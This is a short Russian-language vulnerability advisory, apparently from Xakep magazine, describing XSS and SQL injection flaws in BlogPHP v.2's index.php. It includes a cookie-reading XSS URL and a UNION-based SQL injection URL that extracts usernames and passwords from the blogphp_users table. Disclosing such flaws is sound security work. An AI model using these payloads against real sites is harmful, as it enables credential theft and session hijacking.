Хакер #305. Многошаговые SQL-инъекции
Программа: BlogPHP v.2
Уязвимость позволяет удаленному пользователю выполнить XSS нападение на целевую систему и выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных сценарием index.php. Атакующий может выполнить произвольный сценарий в браузере жертвы в контексте безопасности уязвимого сайта и выполнить произвольные SQL команды в базе данных приложения..
Пример:
XSS:
http://Sitename/index.php?search=<script>alert(document.cookie);</script>
SQL:
http://Sitename/index.php?act=page&id=999999999%27union/**/select/* */0,1,CoNcAt(0x4c6f67696e3a,username,0x3c656e64757365723e, 0x0d0a50617373776f72643a,password,0x3c656e64706173733e),3,4/* */from/**/blogphp_users/*